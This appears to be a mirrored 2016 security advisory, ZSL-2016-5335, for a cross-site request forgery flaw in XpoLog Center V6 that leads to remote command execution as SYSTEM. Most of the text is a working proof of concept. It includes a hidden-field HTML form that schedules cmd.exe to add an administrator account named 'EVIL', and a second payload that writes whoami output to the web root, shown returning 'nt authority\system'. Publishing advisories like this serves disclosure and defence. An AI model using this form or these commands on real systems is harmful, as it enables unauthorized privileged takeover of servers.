XpoLog Center V6 CSRF Remote Command Execution

🗓️ 01 Jul 2016 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 45 Views

XpoLog Center V6 CSRF Remote Command Execution. Arbitrary command execution by adding a command with arguments to given binary. Exploitable with CSRF to execute system commands with SYSTEM privilege

<html><body><p>XpoLog Center V6 CSRF Remote Command Execution


Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
                  6.4254
                  6.4252
                  6.4250
                  6.4237
                  6.4235
                  5.4018

Summary: Applications Log Analysis and Management Platform.

Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.

Tested on: Apache-Coyote/1.1
           Microsoft Windows Server 2012
           Microsoft Windows 7 Professional SP1 EN 64bit
           Java/1.7.0_45
           Java/1.8.0.91


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5335
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php


14.06.2016

--


exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add &amp; net localgroup Administrators EVIL /add"


  </p>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input name="" type="hidden" value=""/>
<input name="csrfToken" type="hidden" value="NoToken"/>
<input name="taskId" type="hidden" value="1465930398522"/>
<input name="taskType" type="hidden" value="exe"/>
<input name="name" type="hidden" value="CCMMDD"/>
<input name="description" type="hidden" value="ZSL"/>
<input name="IsSsh" type="hidden" value="false"/>
<input name="exePath" type="hidden" value='"c:\\windows\\system32\\cmd.exe"'/>
<input name="exeArgs" type="hidden" value='"/C net user EVIL pass123 /add &amp; net localgroup Administrators EVIL /add"'/>
<input name="exeEnvVar" type="hidden" value=""/>
<input name="exeWorkDir" type="hidden" value=""/>
<input name="exeOutputTargetFile" type="hidden" value=""/>
<input name="NameXpoTaskSched" type="hidden" value="taskId_1465930366962"/>
<input name="IdXpoTaskSched" type="hidden" value="taskId_1465930366962"/>
<input name="actionIdXpoTaskSched" type="hidden" value="0"/>
<input name="StateXpoTaskSched" type="hidden" value="1"/>
<input name="schedulerSuffix" type="hidden" value="XpoTaskSched"/>
<input name="trigTypeXpoTaskSched" type="hidden" value="cron"/>
<input name="minutesXpoTaskSched" type="hidden" value="0"/>
<input name="minutesEndXpoTaskSched" type="hidden" value="0"/>
<input name="numOfExecutionsXpoTaskSched" type="hidden" value="0"/>
<input name="frequencyXpoTaskSched" type="hidden" value="daily"/>
<input name="DayInMonthXpoTaskSched" type="hidden" value="all"/>
<input name="dailyTypeXpoTaskSched" type="hidden" value="repeat"/>
<input name="dailyRepeatValueXpoTaskSched" type="hidden" value="1"/>
<input name="dailyRepeatTypeXpoTaskSched" type="hidden" value="second"/>
<input name="hoursXpoTaskSched" type="hidden" value="0"/>
<input name="hoursEndXpoTaskSched" type="hidden" value="0"/>
<input name="hoursOnce0XpoTaskSched" type="hidden" value="-1"/>
<input name="minutesOnce0XpoTaskSched" type="hidden" value="-1"/>
<input name="secondsOnce0XpoTaskSched" type="hidden" value="-1"/>
<input name="jobPriority" type="hidden" value="-1"/>
<input name="ajaxTimestamp" type="hidden" value="1465930905166"/>
<input type="submit" value="Submit"/>
</form>
  


--

exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami &gt; c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"


GET
http://10.0.0.17:30303/logeye/testingus.txt

Response:

nt authority\system
</body></html>

01 Jul 2016 00:00Current

6Medium risk

Vulners AI Score6